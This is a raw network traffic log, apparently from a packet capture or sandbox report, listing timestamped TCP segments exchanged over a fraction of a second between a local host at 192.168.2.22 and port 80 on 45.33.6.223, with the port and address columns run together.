                                                      Sep 19, 2024 15:04:14.026968002 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027003050 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027024984 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027041912 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027057886 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027101040 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027111053 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027144909 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027152061 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027177095 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027189016 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027214050 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027221918 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027249098 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027256012 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027287960 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027304888 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027321100 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027335882 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027368069 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027379036 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027405977 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027432919 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027467966 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027482033 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027503967 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027504921 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027538061 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.027549028 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.027578115 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.068768024 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.068803072 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.068835020 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.068905115 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.073154926 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108388901 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108467102 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108505011 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108504057 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108519077 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108550072 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108556986 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108591080 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108598948 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108625889 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108633995 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108669996 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108676910 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108710051 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108721972 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108741999 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108748913 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108778000 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108827114 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108829975 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108858109 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108890057 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108922005 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108921051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108921051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108921051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108958006 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108990908 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.108999014 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.108999014 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109028101 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109028101 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109050035 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109067917 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109102011 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109119892 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109119892 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109133959 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109147072 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109169006 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109194994 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109200954 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109222889 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109235048 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109261036 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109271049 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109292984 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109303951 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109322071 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109335899 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109353065 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109371901 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109381914 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109405994 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109437943 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109447956 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109447956 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109473944 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.109484911 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.109518051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.114969015 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.114980936 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.114993095 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115022898 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115032911 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115047932 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115047932 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115047932 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115068913 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115068913 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115078926 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115092039 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115098000 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115102053 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115138054 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115190029 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115200996 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115211010 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115221024 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115231991 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115236044 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115242958 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115252018 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115255117 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115259886 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115283012 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115283012 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115288019 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115308046 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115318060 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115329027 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115329981 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115339041 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115350962 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115374088 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115536928 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115581989 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115586042 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115593910 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115603924 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115628004 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115628004 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115731001 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115746975 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115757942 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115767956 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115777016 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115784883 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115784883 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115804911 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115890980 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115901947 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115911961 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115922928 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115935087 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115947962 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115955114 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.115973949 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115986109 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.115997076 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116007090 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116015911 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116019964 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116024971 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116039038 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116049051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116168976 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116178989 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116214037 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116302013 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116312981 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116327047 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116353989 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116353989 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116363049 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116370916 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116381884 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116390944 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116401911 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116413116 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116440058 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116471052 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116494894 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116504908 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116514921 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116524935 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116533995 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116534948 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116544008 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116545916 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116558075 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116559029 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116569042 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116580009 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116586924 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116595030 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116688013 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116698027 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116708040 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116719961 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116730928 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.116738081 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116750956 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116750956 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.116770029 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120054007 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120066881 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120079994 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120101929 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120116949 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120125055 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120146036 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120156050 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120171070 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120176077 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120176077 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120183945 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120192051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120194912 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120202065 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120208025 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120215893 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120219946 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120246887 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120250940 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120264053 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120265007 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120276928 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120285988 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120287895 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120296955 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120305061 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.120318890 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120328903 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.120358944 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.196954966 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197022915 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197062969 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197062969 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197082996 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197119951 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197124958 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197163105 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197185993 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197235107 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197238922 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197274923 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197282076 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197323084 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197324991 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197366953 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197372913 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197412968 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197416067 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197448969 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197463036 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197485924 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197504044 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197521925 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197536945 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197555065 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197563887 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197603941 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197614908 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197648048 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197663069 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197680950 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197694063 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197720051 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197752953 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197752953 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197766066 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197793007 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197807074 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197825909 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197844028 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197859049 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197874069 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197891951 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197906017 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197921991 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197936058 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197956085 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.197974920 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.197989941 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198002100 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198020935 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198034048 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198055983 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198070049 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198087931 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198107958 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198118925 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198122025 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198154926 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198170900 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198187113 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198188066 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198219061 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198224068 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198257923 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198267937 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198291063 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198306084 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198324919 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198335886 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198357105 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198368073 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198398113 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.198400021 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.198445082 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.203708887 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.203767061 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.203830957 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.203866005 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.203880072 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.203910112 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.203922987 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.203973055 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.203974009 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204010010 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204022884 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204045057 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204055071 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204082012 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204093933 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204114914 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204125881 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204148054 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204159975 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204181910 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204195023 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204230070 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204278946 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204323053 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.204484940 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.204530954 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205297947 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205332041 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205360889 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205368042 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205395937 CEST4916280192.168.2.2245.33.6.223
